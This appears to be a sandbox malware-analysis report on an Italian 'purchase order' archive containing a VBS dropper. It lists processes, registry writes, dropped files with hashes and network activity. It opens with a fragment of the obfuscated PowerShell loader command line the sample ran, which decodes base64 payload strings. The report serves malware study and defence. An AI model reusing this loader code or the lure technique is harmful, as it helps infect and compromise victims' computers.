u+Over+S rp%Bu,l$ Rivo caRgtepk ecan no EMus yT au.Bou cLogrOunruuPregNS ant') ;$Bisonen=$Orkney[$Hyperperfection]}$Skizofreni231=410246;$Facetter=30742;Recoagulated (Nectarium 'he.a$UnlaGPal LInhuOE enB SupA eklDi r:SuitUErodNLiniiParanDisstHemmeNonbRllebwSmaaO Su vTaarEbracN Non Unsc= ery GlycGNon.eKlattDr,t-knocCAffaO defN ejsTextreKidnn Fort,ord Hypo$SponU.ongNPresFS ecO Te rAnekg.verEdaarTApioTLav AverabS anLsvige');Recoagulated (Nectarium ' utb$PerigCoa.lDas,oblowbSubfa oldl Unp:ShedGDiabrSkamuPaa n Intds ahl mmuoristv ArisHaspmSpe dRingeAdeprBr,esStag Vedh=Smaa Unde[ DevSSlbny ,rosSuctt ImmeDestmUngd.ReseCSkiloF,nkn Ddfv ine ctrSkartI.io]Prae:Re u:ShriFa atrFos opourmD,meBDipnaSlu s Ku,eLee 6stvn4FalaSTppetBlinrBe uiA.xinFiskg Imp(Coll$SentUHaugnSphaiIdo n Pr,t Chie S rrMascwLedeo ArmvDanseObtrnDj l)');Recoagulated (Nectarium 'Lser$FlidgB,gglLongoFletB GenAKrafl Dis: v,nAFogofAfklfVoldyvaarrPreciMn.vNUmteGPro S eksmPanaUHaanlAdvoi DusGBil HAdvoED.koD S,jE RacrSove Chal=Elek Adje[JejuSPilgyCl,ns doTChilESkggmRegi.AzietStatePro xOvertEd a.BageEStiln ChlcRaduOKh pd NatISkgvnMidtGH em]I.ur:Dubl:A,spaai.lSDundCFodei,luoiMats.Te sGElekE intTRagsS HasTTrigR .hoIRa tnmetaGInds(Navl$ AppG aysRCep.UEtplnHelmd ral Li.OWa kvBhmiST,gnMF,anDSparEFuglR cupSscam)');Recoagulated (Nectarium ' aad$VrtdgEnkeLSystoProtbM chaPlatLQue :WombS ceaP croAAfgaC nteeRdl,bChala AugN Lovd mi =Non $OveraCounf He FCu vYPa,aRFo aIWi.cn,oveGDraySVaskM OpsUInteLOperI anGStenhdokue.lgedG.nte DisR ubc.Lu ssFibeU DekBresysForut PeprAgeriConvn Aargjul.(Amor$DisgSBlookSamfitvanz UneoTacofCofrr BloeU.exNLandiSkat2Best3Unab1 Syl,Touc$.alwfEparaHjdecSnasEPuyatMar TG.lieSvenr sse)');Recoagulated $spaceband;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5968\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7336"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\ORDINE DI ACQUISTO_34002174.gz.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
7456C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7488"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7596"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events
30 227
Read events
30 217
Write events
10
Delete events
0

Modification events

(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\ORDINE DI ACQUISTO_34002174.gz.rar
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(7336) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
Executable files
0
Suspicious files
6
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
7860powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1idhy33n.mfc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7336WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa7336.14427\ORDINE DI ACQUISTO_34002174.vbstext
MD5:7B29C0E97C98BE8F056DCFEF81DC1529
SHA256:52F801D6485AF94907BE595B32FA95F521A9D8FAF03C23B2D1BDFF6757DBDDD0
7620msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DFFCD3E52A9B2D959A2804E0ED77E3BA_2E95A630F2DD13380B1E8651AB8ED2DBbinary
MD5:8875A30B8FEDD0319030C405A438111F
SHA256:7E019BEDA8FE64C5F86C5C9B824E497203BA66A106BBF7385D677CF39ECA78AA
1348powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
7620msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DFFCD3E52A9B2D959A2804E0ED77E3BA_2E95A630F2DD13380B1E8651AB8ED2DBbinary
MD5:454D57924959276964E91ED2E4FEA8DD
SHA256:000AD6315D1F6AB26B560B795944DC601C7E500595F65E8B3DEE5A7CE1752C70
7336WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa7336.15322\ORDINE DI ACQUISTO_34002174.vbstext
MD5:7B29C0E97C98BE8F056DCFEF81DC1529
SHA256:52F801D6485AF94907BE595B32FA95F521A9D8FAF03C23B2D1BDFF6757DBDDD0
7860powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vdbf1jjz.weq.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cqhufwuc.svi.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dlx4mcmd.fhu.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7860powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:CAE164A0DEE22BCAD714ED2A58CC397E
SHA256:14E8A855CF22F13933C3DEEF9ABBDD5A7C22E801F80A6AC6B31EB485FF95090D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
27
DNS requests
18
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7624
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7620
msiexec.exe
GET
200
69.192.161.44:80
http://x1.c.lencr.org/
unknown
whitelisted
7624
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7596
msiexec.exe
GET
200
69.192.161.44:80
http://x1.c.lencr.org/
unknown
whitelisted
7620
msiexec.exe
GET
200
95.101.54.131:80
http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgVUTXRP3GD61jDYQ3Ez90wEpQ%3D%3D
unknown
whitelisted
7596
msiexec.exe
GET
200
95.101.54.131:80
http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgVUTXRP3GD61jDYQ3Ez90wEpQ%3D%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.20:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.206
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.30
  • 23.216.77.8
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.20
  • 40.126.32.76
  • 20.190.160.130
  • 40.126.32.138
  • 20.190.160.132
  • 20.190.160.2
  • 40.126.32.68
  • 20.190.160.17
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
mack-concord.hr
  • 195.29.178.20
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ORDINE DI ACQUISTO_34002174.gz